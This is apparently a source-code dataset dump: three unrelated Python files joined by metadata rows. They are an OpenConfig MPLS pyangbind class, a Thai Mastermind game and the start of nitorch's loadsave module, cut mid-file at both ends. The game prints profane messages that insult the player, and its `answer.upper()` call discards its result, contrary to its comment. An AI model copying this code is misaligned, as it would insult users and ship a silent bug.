"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """protection_style_requested must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:UNPROTECTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_PROTECTION_REQUIRED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:UNPROTECTED"), is_leaf=True, yang_name="protection-style-requested", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__protection_style_requested = t
if hasattr(self, "_set"):
self._set()
def _unset_protection_style_requested(self):
self.__protection_style_requested = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:UNPROTECTED"),
is_leaf=True,
yang_name="protection-style-requested",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_reoptimize_timer(self):
"""
Getter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
return self.__reoptimize_timer
def _set_reoptimize_timer(self, v, load=False):
"""
Setter method for reoptimize_timer, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/reoptimize_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_reoptimize_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reoptimize_timer() directly.
YANG Description: frequency of reoptimization of
a traffic engineered LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """reoptimize_timer must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__reoptimize_timer = t
if hasattr(self, "_set"):
self._set()
def _unset_reoptimize_timer(self):
self.__reoptimize_timer = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="reoptimize-timer",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_source(self):
"""
Getter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
YANG Description: RSVP-TE tunnel source address
"""
return self.__source
def _set_source(self, v, load=False):
"""
Setter method for source, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/source (inet:ip-address)
If this variable is read-only (config: false) in the
source YANG file, then _set_source is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source() directly.
YANG Description: RSVP-TE tunnel source address
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """source must be of a type compatible with inet:ip-address""",
"defined-type": "inet:ip-address",
"generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}),RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}),], is_leaf=True, yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address', is_config=True)""",
}
)
self.__source = t
if hasattr(self, "_set"):
self._set()
def _unset_source(self):
self.__source = YANGDynClass(
base=[
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
},
),
],
is_leaf=True,
yang_name="source",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ip-address",
is_config=True,
)
def _get_soft_preemption(self):
"""
Getter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
YANG Description: Enables RSVP soft-preemption on this LSP
"""
return self.__soft_preemption
def _set_soft_preemption(self, v, load=False):
"""
Setter method for soft_preemption, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/soft_preemption (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_soft_preemption is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_soft_preemption() directly.
YANG Description: Enables RSVP soft-preemption on this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """soft_preemption must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__soft_preemption = t
if hasattr(self, "_set"):
self._set()
def _unset_soft_preemption(self):
self.__soft_preemption = YANGDynClass(
base=YANGBool,
default=YANGBool("false"),
is_leaf=True,
yang_name="soft-preemption",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_setup_priority(self):
"""
Getter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
return self.__setup_priority
def _set_setup_priority(self, v, load=False):
"""
Setter method for setup_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/setup_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_setup_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_setup_priority() directly.
YANG Description: RSVP-TE preemption priority during LSP setup, lower is
higher priority; default 7 indicates that LSP will not
preempt established LSPs during setup
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """setup_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(7), is_leaf=True, yang_name="setup-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__setup_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_setup_priority(self):
self.__setup_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
7
),
is_leaf=True,
yang_name="setup-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_hold_priority(self):
"""
Getter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
return self.__hold_priority
def _set_hold_priority(self, v, load=False):
"""
Setter method for hold_priority, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/hold_priority (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_hold_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_hold_priority() directly.
YANG Description: preemption priority once the LSP is established,
lower is higher priority; default 0 indicates other LSPs
will not preempt the LSPs once established
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """hold_priority must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..7']}), default=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8)(0), is_leaf=True, yang_name="hold-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__hold_priority = t
if hasattr(self, "_set"):
self._set()
def _unset_hold_priority(self):
self.__hold_priority = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..7"]},
),
default=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
)(
0
),
is_leaf=True,
yang_name="hold-priority",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
name = __builtin__.property(_get_name, _set_name)
type = __builtin__.property(_get_type, _set_type)
signaling_protocol = __builtin__.property(
_get_signaling_protocol, _set_signaling_protocol
)
description = __builtin__.property(_get_description, _set_description)
admin_status = __builtin__.property(_get_admin_status, _set_admin_status)
preference = __builtin__.property(_get_preference, _set_preference)
metric_type = __builtin__.property(_get_metric_type, _set_metric_type)
metric = __builtin__.property(_get_metric, _set_metric)
shortcut_eligible = __builtin__.property(
_get_shortcut_eligible, _set_shortcut_eligible
)
protection_style_requested = __builtin__.property(
_get_protection_style_requested, _set_protection_style_requested
)
reoptimize_timer = __builtin__.property(
_get_reoptimize_timer, _set_reoptimize_timer
)
source = __builtin__.property(_get_source, _set_source)
soft_preemption = __builtin__.property(_get_soft_preemption, _set_soft_preemption)
setup_priority = __builtin__.property(_get_setup_priority, _set_setup_priority)
hold_priority = __builtin__.property(_get_hold_priority, _set_hold_priority)
_pyangbind_elements = OrderedDict(
[
("name", name),
("type", type),
("signaling_protocol", signaling_protocol),
("description", description),
("admin_status", admin_status),
("preference", preference),
("metric_type", metric_type),
("metric", metric),
("shortcut_eligible", shortcut_eligible),
("protection_style_requested", protection_style_requested),
("reoptimize_timer", reoptimize_timer),
("source", source),
("soft_preemption", soft_preemption),
("setup_priority", setup_priority),
("hold_priority", hold_priority),
]
)
| 49.115198 | 2,019 | 0.533352 | 20,520 | 212,325 | 5.324659 | 0.014425 | 0.077099 | 0.11283 | 0.127547 | 0.996568 | 0.994582 | 0.994582 | 0.994582 | 0.994582 | 0.994582 | 0 | 0.010337 | 0.339324 | 212,325 | 4,322 | 2,020 | 49.126562 | 0.76856 | 0.121997 | 0 | 0.841157 | 0 | 0.011463 | 0.390554 | 0.163271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025655 | false | 0 | 0.004094 | 0 | 0.049945 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6b6df4aced418ca001e310d28f38c6f51d7e61b4 | 6,376 | py | Python | 04_Fucking_Mastermind_By_DaengGuitar_PlusScore.py | HelloYeew/kurohato-vs-python | b68d96be881b35b6893c30b6f73b2c41162c199b | [
"MIT"
] | null | null | null | 04_Fucking_Mastermind_By_DaengGuitar_PlusScore.py | HelloYeew/kurohato-vs-python | b68d96be881b35b6893c30b6f73b2c41162c199b | [
"MIT"
] | null | null | null | 04_Fucking_Mastermind_By_DaengGuitar_PlusScore.py | HelloYeew/kurohato-vs-python | b68d96be881b35b6893c30b6f73b2c41162c199b | [
"MIT"
] | null | null | null | # Prog-04-Fuck: Fucking Mastermind Game Savage Version
# กูอาจารย์แดงกีตาร์จะมาสอนมึงเนื่องในโอกาสวันวาเลนไทน์เหี้ยๆนี่ Name ผมมีสองจอ ดับเบิ้ลจอ
import random
import math
# import math มาทำเหี้ยไรไม่ใช้เนี่ย
# ตัวแปรตัวใหญ่เป็น enum เอ้อ ได้อยู่
WINNING_MSG = "Congratulations! You won the game."
LOSING_MSG = "Sorry! You just lost it."
code = ''.join(random.sample('ABCDEF', 4))
print('Please guess the puzzle code using')
print('the four distinct code characters from [A to F]:')
# เขียนมาทำเหี้ยไรขีดเนี่ย
# Use for check answer when testing a program
# print(f"Answer : {code}")
code_split = list(code)
# --round 1--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #1 : ")
# This list is make for mark that if it's same we are not going to check again. Just check one time.
check_status = [' ', ' ', ' ', ' ']
# Support when some player not use a capitalize character when play this fucking game.
answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}คิดว่าเขียนเกินแล้วเก๋าหรอไอเหี้ย")
elif len(answer) < 4:
print(f"{' ' * 10}เอ้าไอ้นี่ เกมนี้เขาให้เขียน 4 ตัวเขียนมา {len(answer)} ตัว คิดว่าเจ๋งหรอ ตกนรกนะแบบเนี้ย")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print("Congratulations! You won the game.")
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 2--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #2 : ")
# This list is make for mark that if it's same we are not going to check again. Just check one time.
check_status = [' ', ' ', ' ', ' ']
# Support when some player not use a capitalize character when play this fucking game.
answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}คิดว่าเขียนเกินแล้วเก๋าหรอไอเหี้ย")
elif len(answer) < 4:
print(f"{' ' * 10}เอ้าไอ้นี่ เกมนี้เขาให้เขียน 4 ตัวเขียนมา {len(answer)} ตัว คิดว่าเจ๋งหรอ ตกนรกนะแบบเนี้ย")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print("Congratulations! You won the game.")
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split :
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 3--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #3 : ")
# This list is make for mark that if it's same we are not going to check again. Just check one time.
check_status = [' ', ' ', ' ', ' ']
# Support when some player not use a capitalize character when play this fucking game.
answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}คิดว่าเขียนเกินแล้วเก๋าหรอไอเหี้ย")
elif len(answer) < 4:
print(f"{' ' * 10}เอ้าไอ้นี่ เกมนี้เขาให้เขียน 4 ตัวเขียนมา {len(answer)} ตัว คิดว่าเจ๋งหรอ ตกนรกนะแบบเนี้ย")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print("Congratulations! You won the game.")
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
# --round 4--
# Same color and same position
p = 0
# Same color but not same position
v = 0
# Not fucking same! Where do you get this from?
x = 0
answer = input(f"Turn #4 : ")
# This list is make for mark that if it's same we are not going to check again. Just check one time.
check_status = [' ', ' ', ' ', ' ']
# Support when some player not use a capitalize character when play this fucking game.
answer.upper()
answer_split = list(answer)
if len(answer) > 4:
print(f"{' ' * 10}คิดว่าเขียนเกินแล้วเก๋าหรอไอเหี้ย")
elif len(answer) < 4:
print(f"{' ' * 10}เอ้าไอ้นี่ เกมนี้เขาให้เขียน 4 ตัวเขียนมา {len(answer)} ตัว คิดว่าเจ๋งหรอ ตกนรกนะแบบเนี้ย")
elif answer == code:
# Import library here? No rule about library in your sheet LMAO.
import sys
print("Congratulations! You won the game.")
sys.exit()
else:
if answer_split[0] == code_split[0]:
p += 1
elif answer_split[0] in code_split:
v += 1
else:
x += 1
if answer_split[1] == code_split[1]:
p += 1
elif answer_split[1] in code_split:
v += 1
else:
x += 1
if answer_split[2] == code_split[2]:
p += 1
elif answer_split[2] in code_split:
v += 1
else:
x += 1
if answer_split[3] == code_split[3]:
p += 1
elif answer_split[3] in code_split:
v += 1
else:
x += 1
print(f"{' '*10}P={p},V={v},X={x}")
print("Sorry! You just lost it.")
print(f"The answer is {code}")
print("Please try again...")
| 28.591928 | 113 | 0.596769 | 1,183 | 6,376 | 3.267118 | 0.146238 | 0.102458 | 0.053816 | 0.049677 | 0.873221 | 0.856662 | 0.856662 | 0.856662 | 0.856662 | 0.856662 | 0 | 0.03277 | 0.258156 | 6,376 | 222 | 114 | 28.720721 | 0.755814 | 0.278388 | 0 | 0.914286 | 0 | 0.022857 | 0.234392 | 0.050821 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034286 | 0 | 0.034286 | 0.12 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6bfe22818e6a4684769aaaff60381f75f89aa9d6 | 12,070 | py | Python | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | 1 | 2021-04-09T21:24:47.000Z | 2021-04-09T21:24:47.000Z | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | null | null | null | nitorch/io/loadsave.py | wyli/nitorch | 3ecd18944cf45fb9193c4c6ffc32953c4d1c71ac | [
"MIT"
] | null | null | null | """Functional API to load and save arrays."""
import os
from .mapping import MappedArray
from .readers import reader_classes
from .writers import writer_classes
_DEBUG = False
def _trace(*args, **kwargs):
if _DEBUG:
print(*args, **kwargs)
def map(file_like, permission='r+', keep_open=True):
"""Map a data file
Parameters
----------
file_like : str or file object
Input file
permission : {'r', 'r+'}, default='r+'
File permission: 'r' means read-only while 'r+' means read and
write. 'r+' is necessary for partial writing into the file.
keep_open : bool, default=True
Keep file open. Can be more efficient if multiple reads (or
writes) are expected.
Returns
-------
dat : MappedArray
A `MappedArray` instance. Data can then be loaded in memory
by calling `dat.data()` or `dat.fdata()`.
"""
remaining_classes = []
if isinstance(file_like, MappedArray):
# nothing to do
return file_like
if isinstance(file_like, (str, os.PathLike)):
# first guess based on file extension
base, ext = os.path.splitext(file_like)
if ext.lower() == '.gz':
base, ext = os.path.splitext(base)
for klass in reader_classes:
if ext.lower() in klass.possible_extensions():
try:
_trace('try', klass.__name__, end=' ')
out = klass(file_like, permission, keep_open)
_trace('-> success')
return out
except klass.FailedReadError:
_trace('-> failed')
pass
else:
remaining_classes.append(klass)
# second guess
for klass in remaining_classes:
try:
_trace('try', klass.__name__, end=' ')
out = klass(file_like, permission, keep_open)
_trace('-> success')
return out
except klass.FailedReadError:
_trace('-> failed')
pass
raise ValueError('Could not read {}'.format(file_like))
def load(file_like, *args, attributes=None, **kwargs):
"""Read a data file and load it in memory.
Parameters
----------
file_like : str or file object
Path to file or file object (with methods `seek`, `read`)
dtype : type or torch.dtype or np.dtype, optional
Output data type. By default, keep the on-disk data type.
device : torch.device, default='cpu'
Output device.
rand : bool, default=False
If the on-disk dtype is not floating point, sample noise
in the uncertainty interval.
cutoff : float or (float, float), default=(0, 1)
Percentile cutoff. If only one value is provided, it is
assumed to relate to the upper percentile.
dim : int or list[int], optional
Dimensions along which to compute percentiles.
By default, they are computed on the flattened array.
